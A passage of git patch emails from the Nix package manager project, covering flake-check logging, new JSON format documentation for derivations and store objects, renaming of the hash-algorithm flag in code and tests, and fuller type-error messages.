fmt("checking bundler '%s'", attrPath)); state->forceValue(v, pos); if (!v.isLambda()) throw Error("bundler must be a function"); From d75a5f427a385e56c821fdf49a70a150fe7fe6fd Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 1 Sep 2023 13:11:58 -0700 Subject: [PATCH 316/654] Print how many checks are run --- src/nix/flake.cc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 850ea77da..0e34bd76a 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -781,7 +781,8 @@ struct CmdFlakeCheck : FlakeCommand } if (build && !drvPaths.empty()) { - Activity act(*logger, lvlInfo, actUnknown, "running flake checks"); + Activity act(*logger, lvlInfo, actUnknown, + fmt("running %d flake checks", drvPaths.size())); store->buildPaths(drvPaths); } if (hasErrors) From 561a56cd13b4f12e3dfb6c5e3f42e5d8add04ecc Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 13:53:40 -0800 Subject: [PATCH 317/654] Add release notes --- .../rl-next/nix-flake-check-logs-actions.md | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 doc/manual/rl-next/nix-flake-check-logs-actions.md diff --git a/doc/manual/rl-next/nix-flake-check-logs-actions.md b/doc/manual/rl-next/nix-flake-check-logs-actions.md new file mode 100644 index 000000000..53a7b35eb --- /dev/null +++ b/doc/manual/rl-next/nix-flake-check-logs-actions.md @@ -0,0 +1,33 @@ +--- +synopsis: Some stack overflow segfaults are fixed +issues: 8882 +prs: 8893 +--- + +`nix flake check` now logs the checks it runs and the derivations it evaluates: + +``` +$ nix flake check -v +evaluating flake... +checking flake output 'checks'... +checking derivation 'checks.aarch64-darwin.ghciwatch-tests'... +derivation evaluated to /nix/store/nh7dlvsrhds4cxl91mvgj4h5cbq6skmq-ghciwatch-test-0.3.0.drv +checking derivation 'checks.aarch64-darwin.ghciwatch-clippy'... 
+derivation evaluated to /nix/store/9cb5a6wmp6kf6hidqw9wphidvb8bshym-ghciwatch-clippy-0.3.0.drv +checking derivation 'checks.aarch64-darwin.ghciwatch-doc'... +derivation evaluated to /nix/store/8brdd3jbawfszpbs7vdpsrhy80as1il8-ghciwatch-doc-0.3.0.drv +checking derivation 'checks.aarch64-darwin.ghciwatch-fmt'... +derivation evaluated to /nix/store/wjhs0l1njl5pyji53xlmfjrlya0wmz8p-ghciwatch-fmt-0.3.0.drv +checking derivation 'checks.aarch64-darwin.ghciwatch-audit'... +derivation evaluated to /nix/store/z0mps8dyj2ds7c0fn0819y5h5611033z-ghciwatch-audit-0.3.0.drv +checking flake output 'packages'... +checking derivation 'packages.aarch64-darwin.default'... +derivation evaluated to /nix/store/41abbdyglw5x9vcsvd89xan3ydjf8d7r-ghciwatch-0.3.0.drv +checking flake output 'apps'... +checking flake output 'devShells'... +checking derivation 'devShells.aarch64-darwin.default'... +derivation evaluated to /nix/store/bc935gz7dylzmcpdb5cczr8gngv8pmdb-nix-shell.drv +running 5 flake checks... +warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux +Use '--all-systems' to check all. +``` From edf3ecc497d9931f84d8a28679b51773c761fdd8 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 22 Oct 2023 20:01:01 -0400 Subject: [PATCH 318/654] Document JSON formats Good to document these formats separately from commands that happen to use them. Eventually I would like this and `builtins.derivation` to refer to a store section on derivations that is authoritative, but that doesn't yet exist, and will take some time to make. So I think we're just best off merging this now as is. 
Co-authored-by: Valentin Gagarin --- doc/manual/src/SUMMARY.md.in | 3 + doc/manual/src/glossary.md | 2 +- doc/manual/src/json/derivation.md | 71 +++++++++++++++++ doc/manual/src/json/store-object-info.md | 97 ++++++++++++++++++++++++ src/libstore/globals.hh | 2 +- src/nix/derivation-add.md | 7 +- src/nix/derivation-show.md | 60 +-------------- 7 files changed, 181 insertions(+), 61 deletions(-) create mode 100644 doc/manual/src/json/derivation.md create mode 100644 doc/manual/src/json/store-object-info.md diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index c67ddc6cb..10fe51fc9 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ -104,6 +104,9 @@ - [Channels](command-ref/files/channels.md) - [Default Nix expression](command-ref/files/default-nix-expression.md) - [Architecture and Design](architecture/architecture.md) +- [JSON Formats](json/index.md) + - [Store Object Info](json/store-object-info.md) + - [Derivation](json/derivation.md) - [Protocols](protocols/index.md) - [Serving Tarball Flakes](protocols/tarball-fetcher.md) - [Derivation "ATerm" file format](protocols/derivation-aterm.md) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 3c0570a44..124dc8d2e 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -127,7 +127,7 @@ non-[fixed-output](#gloss-fixed-output-derivation) derivation. -- [output-addressed store object]{#gloss-output-addressed-store-object} +- [content-addressed store object]{#gloss-content-addressed-store-object} A [store object] whose [store path] is determined by its contents. This includes derivations, the outputs of [content-addressed derivations](#gloss-content-addressed-derivation), and the outputs of [fixed-output derivations](#gloss-fixed-output-derivation). 
diff --git a/doc/manual/src/json/derivation.md b/doc/manual/src/json/derivation.md new file mode 100644 index 000000000..649d543cc --- /dev/null +++ b/doc/manual/src/json/derivation.md @@ -0,0 +1,71 @@ +# Derivation JSON Format + +> **Warning** +> +> This JSON format is currently +> [**experimental**](@docroot@/contributing/experimental-features.md#xp-feature-nix-command) +> and subject to change. + +The JSON serialization of a +[derivations](@docroot@/glossary.md#gloss-store-derivation) +is a JSON object with the following fields: + +* `name`: + The name of the derivation. + This is used when calculating the store paths of the derivation's outputs. + +* `outputs`: + Information about the output paths of the derivation. + This is a JSON object with one member per output, where the key is the output name and the value is a JSON object with these fields: + + * `path`: The output path. + + * `hashAlgo`: + For fixed-output derivations, the hashing algorithm (e.g. `sha256`), optionally prefixed by `r:` if `hash` denotes a NAR hash rather than a flat file hash. + + * `hash`: + For fixed-output derivations, the expected content hash in base-16. + + > **Example** + > + > ```json + > "outputs": { + > "out": { + > "path": "/nix/store/2543j7c6jn75blc3drf4g5vhb1rhdq29-source", + > "hashAlgo": "r:sha256", + > "hash": "6fc80dcc62179dbc12fc0b5881275898f93444833d21b89dfe5f7fbcbb1d0d62" + > } + > } + > ``` + +* `inputSrcs`: + A list of store paths on which this derivation depends. + +* `inputDrvs`: + A JSON object specifying the derivations on which this derivation depends, and what outputs of those derivations. + + > **Example** + > + > ```json + > "inputDrvs": { + > "/nix/store/6lkh5yi7nlb7l6dr8fljlli5zfd9hq58-curl-7.73.0.drv": ["dev"], + > "/nix/store/fn3kgnfzl5dzym26j8g907gq3kbm8bfh-unzip-6.0.drv": ["out"] + > } + > ``` + + specifies that this derivation depends on the `dev` output of `curl`, and the `out` output of `unzip`. 
+ +* `system`: + The system type on which this derivation is to be built + (e.g. `x86_64-linux`). + +* `builder`: + The absolute path of the program to be executed to run the build. + Typically this is the `bash` shell + (e.g. `/nix/store/r3j288vpmczbl500w6zz89gyfa4nr0b1-bash-4.4-p23/bin/bash`). + +* `args`: + The command-line arguments passed to the `builder`. + +* `env`: + The environment passed to the `builder`. diff --git a/doc/manual/src/json/store-object-info.md b/doc/manual/src/json/store-object-info.md new file mode 100644 index 000000000..db43c2fa1 --- /dev/null +++ b/doc/manual/src/json/store-object-info.md @@ -0,0 +1,97 @@ +# Store object info JSON format + +> **Warning** +> +> This JSON format is currently +> [**experimental**](@docroot@/contributing/experimental-features.md#xp-feature-nix-command) +> and subject to change. + +Info about a [store object]. + +* `path`: + + [Store path][store path] to the given store object. + +* `narHash`: + + Hash of the [file system object] part of the store object when serialized as a [Nix Archive](#gloss-nar). + +* `narSize`: + + Size of the [file system object] part of the store object when serialized as a [Nix Archive](#gloss-nar). + +* `references`: + + An array of [store paths][store path], possibly including this one. + +* `ca` (optional): + + Content address of this store object's file system object, used to compute its store path. + +[store path]: @docroot@/glossary.md#gloss-store-path +[file system object]: @docroot@/store/file-system-object.md + +## Impure fields + +These are not intrinsic properties of the store object. +In other words, the same store object residing in different store could have different values for these properties. + +* `deriver` (optional): + + The path to the [derivation] from which this store object is produced. + + [derivation]: @docroot@/glossary.md#gloss-store-derivation + +* `registrationTime` (optional): + + When this derivation was added to the store. 
 + +* `ultimate` (optional): + + Whether this store object is trusted because we built it ourselves, rather than substituted a build product from elsewhere. + +* `signatures` (optional): + + Signatures claiming that this store object is what it claims to be. + Not relevant for [content-addressed] store objects, + but useful for [input-addressed] store objects. + + [content-addressed]: @docroot@/glossary.md#gloss-content-addressed-store-object + [input-addressed]: @docroot@/glossary.md#gloss-input-addressed-store-object + +### `.narinfo` extra fields + +This metadata is specific to the "binary cache" family of Nix store types. +This information is not intrinsic to the store object, but about how it is stored. + +* `url`: + + Where to download a compressed archive of the file system objects of this store object. + +* `compression`: + + The compression format that the archive is in. + +* `fileHash`: + + A digest for the compressed archive itself, as opposed to the data contained within. + +* `fileSize`: + + The size of the compressed archive itself. + +## Computed closure fields + +These fields are not stored at all, but computed by traversing the other fields across all the store objects in a [closure]. + +* `closureSize`: + + The total size of the compressed archive itself for this object, and the compressed archive of every object in this object's [closure]. + +### `.narinfo` extra fields + +* `closureSize`: + + The total size of this store object and every other object in its [closure]. 
+ +[closure]: @docroot@/glossary.md#gloss-closure diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index 49a4c1f2a..3107c8aed 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -635,7 +635,7 @@ public: - the store object has been signed using a key in the trusted keys list - the [`require-sigs`](#conf-require-sigs) option has been set to `false` - - the store object is [output-addressed](@docroot@/glossary.md#gloss-output-addressed-store-object) + - the store object is [content-addressed](@docroot@/glossary.md#gloss-content-addressed-store-object) )", {"binary-cache-public-keys"}}; diff --git a/src/nix/derivation-add.md b/src/nix/derivation-add.md index f116681ab..d9b8467df 100644 --- a/src/nix/derivation-add.md +++ b/src/nix/derivation-add.md @@ -9,10 +9,11 @@ Store derivations are used internally by Nix. They are store paths with extension `.drv` that represent the build-time dependency graph to which a Nix expression evaluates. -[store derivation]: ../../glossary.md#gloss-store-derivation -The JSON format is documented under the [`derivation show`] command. +[store derivation]: @docroot@/glossary.md#gloss-store-derivation -[`derivation show`]: ./nix3-derivation-show.md +`nix derivation add` takes a single derivation in the following format: + +{{#include ../../json/derivation.md}} )"" diff --git a/src/nix/derivation-show.md b/src/nix/derivation-show.md index 1296e2885..884f1adc6 100644 --- a/src/nix/derivation-show.md +++ b/src/nix/derivation-show.md @@ -5,8 +5,6 @@ R""( * Show the [store derivation] that results from evaluating the Hello package: - [store derivation]: ../../glossary.md#gloss-store-derivation - ```console # nix derivation show nixpkgs#hello { @@ -48,62 +46,12 @@ a Nix expression evaluates. By default, this command only shows top-level derivations, but with `--recursive`, it also shows their dependencies. 
-The JSON output is a JSON object whose keys are the store paths of the -derivations, and whose values are a JSON object with the following -fields: +[store derivation]: @docroot@/glossary.md#gloss-store-derivation -* `name`: The name of the derivation. This is used when calculating the - store paths of the derivation's outputs. +`nix derivation show` outputs a JSON map of [store path]s to derivations in the following format: -* `outputs`: Information about the output paths of the - derivation. This is a JSON object with one member per output, where - the key is the output name and the value is a JSON object with these - fields: +[store path]: @docroot@/glossary.md#gloss-store-path - * `path`: The output path. - * `hashAlgo`: For fixed-output derivations, the hashing algorithm - (e.g. `sha256`), optionally prefixed by `r:` if `hash` denotes a - NAR hash rather than a flat file hash. - * `hash`: For fixed-output derivations, the expected content hash in - base-16. - - Example: - - ```json - "outputs": { - "out": { - "path": "/nix/store/2543j7c6jn75blc3drf4g5vhb1rhdq29-source", - "hashAlgo": "r:sha256", - "hash": "6fc80dcc62179dbc12fc0b5881275898f93444833d21b89dfe5f7fbcbb1d0d62" - } - } - ``` - -* `inputSrcs`: A list of store paths on which this derivation depends. - -* `inputDrvs`: A JSON object specifying the derivations on which this - derivation depends, and what outputs of those derivations. For - example, - - ```json - "inputDrvs": { - "/nix/store/6lkh5yi7nlb7l6dr8fljlli5zfd9hq58-curl-7.73.0.drv": ["dev"], - "/nix/store/fn3kgnfzl5dzym26j8g907gq3kbm8bfh-unzip-6.0.drv": ["out"] - } - ``` - - specifies that this derivation depends on the `dev` output of - `curl`, and the `out` output of `unzip`. - -* `system`: The system type on which this derivation is to be built - (e.g. `x86_64-linux`). - -* `builder`: The absolute path of the program to be executed to run - the build. Typically this is the `bash` shell - (e.g. 
`/nix/store/r3j288vpmczbl500w6zz89gyfa4nr0b1-bash-4.4-p23/bin/bash`). - -* `args`: The command-line arguments passed to the `builder`. - -* `env`: The environment passed to the `builder`. +{{#include ../../json/derivation.md}} )"" From 65294fe5fe4fd5419ea374e73710e8a217ba8060 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 20 Jan 2024 17:07:21 -0500 Subject: [PATCH 319/654] Fix typo in upcomming release notes Thanks @cole-h for finding in https://github.com/NixOS/nix/pull/9815#discussion_r1460604130 --- doc/manual/rl-next/nix-store-add.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/rl-next/nix-store-add.md b/doc/manual/rl-next/nix-store-add.md index d55711569..5ef2913b4 100644 --- a/doc/manual/rl-next/nix-store-add.md +++ b/doc/manual/rl-next/nix-store-add.md @@ -4,4 +4,4 @@ prs: 9809 --- Adds a missing feature that was present in the old CLI, and matches our -plans to have similar flags for `nix hash convert` and `hash hash path`. +plans to have similar flags for `nix hash convert` and `nix hash path`. From 202c5e2afc14232b3c9ff32b014387d76c45b3d7 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 20:14:48 -0500 Subject: [PATCH 320/654] Start standardizing hash algo flags Do this if we want to do `--hash-algo` everywhere, and not `--algo` for hash commands. The new `nix hash convert` is updated. Deprecated new CLI commands are left as-is (`nix hash path` needs to be redone and is also left as-is). --- doc/manual/rl-next/nix-hash-convert.md | 12 +++++----- src/libutil/args.hh | 6 +++++ src/nix/add-to-store.cc | 2 +- src/nix/hash.cc | 2 +- tests/functional/hash.sh | 32 +++++++++++++------------- 5 files changed, 30 insertions(+), 24 deletions(-) diff --git a/doc/manual/rl-next/nix-hash-convert.md b/doc/manual/rl-next/nix-hash-convert.md index 2b718a66b..69db9508a 100644 --- a/doc/manual/rl-next/nix-hash-convert.md +++ b/doc/manual/rl-next/nix-hash-convert.md @@ -9,7 +9,7 @@ to stabilization! 
Examples: - Convert the hash to `nix32`. ```bash - $ nix hash convert --algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" + $ nix hash convert --hash-algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" vw46m23bizj4n8afrc0fj19wrp7mj3c0 ``` `nix32` is a base32 encoding with a nix-specific character set. @@ -17,23 +17,23 @@ to stabilization! Examples: hash. - Convert the hash to the `sri` format that includes an algorithm specification: ```bash - nix hash convert --algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" + nix hash convert --hash-algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" sha1-gA1Zz808BekAy04hS+SPa4hqCN8= ``` or with an explicit `-to` format: ```bash - nix hash convert --algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" + nix hash convert --hash-algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" sha1-gA1Zz808BekAy04hS+SPa4hqCN8= ``` - Assert the input format of the hash: ```bash - nix hash convert --algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" + nix hash convert --hash-algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' - nix hash convert --algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" + nix hash convert --hash-algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= ``` -The `--to`/`--from`/`--algo` parameters have context-sensitive auto-completion. +The `--to`/`--from`/`--hash-algo` parameters have context-sensitive auto-completion. 
## Related Deprecations diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 18b0ae583..6c9c48065 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -177,7 +177,13 @@ protected: std::optional experimentalFeature; static Flag mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha); + static Flag mkHashAlgoFlag(HashAlgorithm * ha) { + return mkHashAlgoFlag("hash-algo", ha); + } static Flag mkHashAlgoOptFlag(std::string && longName, std::optional * oha); + static Flag mkHashAlgoOptFlag(std::optional * oha) { + return mkHashAlgoOptFlag("hash-algo", oha); + } static Flag mkHashFormatFlagWithDefault(std::string && longName, HashFormat * hf); static Flag mkHashFormatOptFlag(std::string && longName, std::optional * ohf); }; diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index f2dbe8a2c..7c534517d 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -53,7 +53,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand }}, }); - addFlag(Flag::mkHashAlgoFlag("hash-algo", &hashAlgo)); + addFlag(Flag::mkHashAlgoFlag(&hashAlgo)); } void run(ref store) override diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 83694306e..8ab89e433 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -141,7 +141,7 @@ struct CmdHashConvert : Command CmdHashConvert(): to(HashFormat::SRI) { addFlag(Args::Flag::mkHashFormatOptFlag("from", &from)); addFlag(Args::Flag::mkHashFormatFlagWithDefault("to", &to)); - addFlag(Args::Flag::mkHashAlgoOptFlag("algo", &algo)); + addFlag(Args::Flag::mkHashAlgoOptFlag(&algo)); expectArgs({ .label = "hashes", .handler = {&hashStrings}, diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index 47eed5178..ff270076e 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -87,7 +87,7 @@ try3() { # $2 = expected hash in base16 # $3 = expected hash in base32 # $4 = expected hash in base64 - h64=$(nix hash convert --algo "$1" --to base64 "$2") + h64=$(nix hash convert --hash-algo "$1" --to 
base64 "$2") [ "$h64" = "$4" ] h64=$(nix-hash --type "$1" --to-base64 "$2") [ "$h64" = "$4" ] @@ -95,13 +95,13 @@ try3() { h64=$(nix hash to-base64 --type "$1" "$2") [ "$h64" = "$4" ] - sri=$(nix hash convert --algo "$1" --to sri "$2") + sri=$(nix hash convert --hash-algo "$1" --to sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix-hash --type "$1" --to-sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix hash to-sri --type "$1" "$2") [ "$sri" = "$1-$4" ] - h32=$(nix hash convert --algo "$1" --to base32 "$2") + h32=$(nix hash convert --hash-algo "$1" --to base32 "$2") [ "$h32" = "$3" ] h32=$(nix-hash --type "$1" --to-base32 "$2") [ "$h32" = "$3" ] @@ -110,7 +110,7 @@ try3() { h16=$(nix-hash --type "$1" --to-base16 "$h32") [ "$h16" = "$2" ] - h16=$(nix hash convert --algo "$1" --to base16 "$h64") + h16=$(nix hash convert --hash-algo "$1" --to base16 "$h64") [ "$h16" = "$2" ] h16=$(nix hash to-base16 --type "$1" "$h64") [ "$h16" = "$2" ] @@ -143,40 +143,40 @@ try3() { # Auto-detecting the input from algo and length. # - sri=$(nix hash convert --algo "$1" "$2") + sri=$(nix hash convert --hash-algo "$1" "$2") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$3") + sri=$(nix hash convert --hash-algo "$1" "$3") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$4") + sri=$(nix hash convert --hash-algo "$1" "$4") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$2") + sri=$(nix hash convert --hash-algo "$1" "$2") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$3") + sri=$(nix hash convert --hash-algo "$1" "$3") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$4") + sri=$(nix hash convert --hash-algo "$1" "$4") [ "$sri" = "$1-$4" ] # # Asserting input format succeeds. 
# - sri=$(nix hash convert --algo "$1" --from base16 "$2") + sri=$(nix hash convert --hash-algo "$1" --from base16 "$2") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" --from nix32 "$3") + sri=$(nix hash convert --hash-algo "$1" --from nix32 "$3") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" --from base64 "$4") + sri=$(nix hash convert --hash-algo "$1" --from base64 "$4") [ "$sri" = "$1-$4" ] # # Asserting input format fails. # - fail=$(nix hash convert --algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --hash-algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?") [[ "$fail" == *"error: input hash"*"exit: 1" ]] - fail=$(nix hash convert --algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --hash-algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") [[ "$fail" == *"error: input hash"*"exit: 1" ]] - fail=$(nix hash convert --algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --hash-algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?") [[ "$fail" == *"error: input hash"*"exit: 1" ]] } From 0bcdb4f5f0830261ecbff1cbc805b215cac1abae Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 22 Jan 2024 08:38:52 -0500 Subject: [PATCH 321/654] Elaborate what the monthly assignments status check entails Co-authored-by: Robert Hensing --- maintainers/README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/maintainers/README.md b/maintainers/README.md index 585e2b50a..fa321c7c0 100644 --- a/maintainers/README.md +++ b/maintainers/README.md @@ -44,7 +44,10 @@ The team meets twice a week: 1. Triage issues and pull requests from the [No Status](#no-status) column (30 min) 2. Discuss issues and pull requests from the [To discuss](#to-discuss) column (30 min). - Once a month, this slot is used to check the [Assigned](#assigned) column to make sure that nothing bitrots in it. 
+ Once a month, each team member checks the [Assigned](#assigned) column for prs/issues assigned to them, to either + - unblock it by providing input + - mark it as draft if it is blocked on the contributor + - escalate it back to the team by moving it to To discuss, and leaving a comment as to why the issue needs to be discussed again. - Work meeting: [Mondays 13:00-15:00 CET](https://calendar.google.com/calendar/event?eid=NTM1MG1wNGJnOGpmOTZhYms3bTB1bnY5cWxfMjAyMjExMjFUMTIwMDAwWiBiOW81MmZvYnFqYWs4b3E4bGZraGczdDBxZ0Bn) From 80b84710b8c676620ed1e8bf8ff3bb1d5bc19b80 Mon Sep 17 00:00:00 2001 From: pennae <82953136+pennae@users.noreply.github.com> Date: Mon, 22 Jan 2024 15:15:53 +0100 Subject: [PATCH 322/654] Update src/libexpr/eval.cc Co-authored-by: John Ericson --- src/libexpr/eval.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index dc9167144..2330102c3 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -427,7 +427,7 @@ EvalState::EvalState( .or_ = symbols.create("or"), .findFile = symbols.create("__findFile"), .nixPath = symbols.create("__nixPath"), - .body = symbols.create("body") + .body = symbols.create("body"), } , repair(NoRepair) , emptyBindings(0) From 316e50cc7c0bad8448c9f475993e52f9d5dee7c0 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 22 Jan 2024 10:32:25 -0500 Subject: [PATCH 323/654] Fix `if`...`if`...`else` ambiguity This can be parsed two ways. Add a pair of braces so it must be parsed the intended way. 
--- src/libexpr/primops/fetchTree.cc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index bc5a69720..d32c264f7 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -174,11 +174,12 @@ static void fetchTree( if (!evalSettings.pureEval && !input.isDirect() && experimentalFeatureSettings.isEnabled(Xp::Flakes)) input = lookupInRegistries(state.store, input).first; - if (evalSettings.pureEval && !input.isLocked()) + if (evalSettings.pureEval && !input.isLocked()) { if (params.isFetchGit) state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchGit' requires a locked input, at %s", state.positions[pos])); else state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); + } state.checkURI(input.toURLString()); From cb7fbd4d831de9d98b7dfd149d8a96939be31bb2 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Wed, 6 Dec 2023 16:03:01 -0800 Subject: [PATCH 324/654] Print value on type error Adds the failing value to `value is while a is expected` error messages. 
--- .../rl-next/print-value-in-type-error.md | 23 ++ .../rl-next/source-positions-in-errors.md | 2 +- doc/manual/rl-next/with-error-reporting.md | 4 +- src/libexpr/eval-inline.hh | 11 +- src/libexpr/eval.cc | 38 ++- src/libexpr/primops.cc | 2 +- src/libexpr/print-ambiguous.cc | 1 + src/libexpr/print-options.hh | 12 + src/libexpr/print.cc | 7 + src/libexpr/print.hh | 21 +- src/libutil/error.cc | 4 +- src/nix/eval.cc | 2 +- tests/functional/dyn-drv/eval-outputOf.sh | 2 +- .../lang/eval-fail-attr-name-type.err.exp | 2 +- .../lang/eval-fail-call-primop.err.exp | 2 +- tests/functional/lang/eval-fail-list.err.exp | 2 +- .../lang/eval-fail-set-override.err.exp | 2 +- .../eval-fail-using-set-as-attr-name.err.exp | 2 +- tests/unit/libexpr/error_traces.cc | 224 +++++++++--------- 19 files changed, 227 insertions(+), 136 deletions(-) create mode 100644 doc/manual/rl-next/print-value-in-type-error.md diff --git a/doc/manual/rl-next/print-value-in-type-error.md b/doc/manual/rl-next/print-value-in-type-error.md new file mode 100644 index 000000000..aaae22756 --- /dev/null +++ b/doc/manual/rl-next/print-value-in-type-error.md @@ -0,0 +1,23 @@ +--- +synopsis: Type errors include the failing value +issues: #561 +prs: #9753 +--- + +In errors like `value is an integer while a list was expected`, the message now +includes the failing value. 
+ +Before: + +``` + error: value is a set while a string was expected +``` + +After: + +``` + error: expected a string but found a set: { ghc810 = «thunk»; + ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; + ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; + ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} +``` diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md index 5b210289d..b1a33d83b 100644 --- a/doc/manual/rl-next/source-positions-in-errors.md +++ b/doc/manual/rl-next/source-positions-in-errors.md @@ -38,5 +38,5 @@ error: | ^ 5| - error: value is a set while a string was expected + error: expected a string but found a set ``` diff --git a/doc/manual/rl-next/with-error-reporting.md b/doc/manual/rl-next/with-error-reporting.md index 10b020956..d9e07df52 100644 --- a/doc/manual/rl-next/with-error-reporting.md +++ b/doc/manual/rl-next/with-error-reporting.md @@ -8,7 +8,7 @@ prs: 9658 Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: ``` -nix-repl> with 1; a +nix-repl> with 1; a error: … @@ -27,5 +27,5 @@ error: 1| with 1; a | ^ - error: value is an integer while a set was expected + error: expected a set but found an integer ``` diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index f7710f819..42cb68bbe 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -1,6 +1,7 @@ #pragma once ///@file +#include "print.hh" #include "eval.hh" namespace nix { @@ -114,7 +115,10 @@ inline void EvalState::forceAttrs(Value & v, Callable getPos, std::string_view e PosIdx pos = getPos(); forceValue(v, pos); if (v.type() != nAttrs) { - error("value is %1% while a set was expected", showType(v)).withTrace(pos, errorCtx).debugThrow(); + error("expected a set but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + 
.withTrace(pos, errorCtx).debugThrow(); } } @@ -124,7 +128,10 @@ inline void EvalState::forceList(Value & v, const PosIdx pos, std::string_view e { forceValue(v, pos); if (!v.isList()) { - error("value is %1% while a list was expected", showType(v)).withTrace(pos, errorCtx).debugThrow(); + error("expected a list but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .withTrace(pos, errorCtx).debugThrow(); } } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 0659a2173..71e956e10 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2,6 +2,7 @@ #include "eval-settings.hh" #include "hash.hh" #include "primops.hh" +#include "print-options.hh" #include "types.hh" #include "util.hh" #include "store-api.hh" @@ -29,9 +30,9 @@ #include #include #include -#include #include #include +#include #include #include @@ -1153,7 +1154,10 @@ inline bool EvalState::evalBool(Env & env, Expr * e, const PosIdx pos, std::stri Value v; e->eval(*this, env, v); if (v.type() != nBool) - error("value is %1% while a Boolean was expected", showType(v)).withFrame(env, *e).debugThrow(); + error("expected a Boolean but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .withFrame(env, *e).debugThrow(); return v.boolean; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -1167,7 +1171,10 @@ inline void EvalState::evalAttrs(Env & 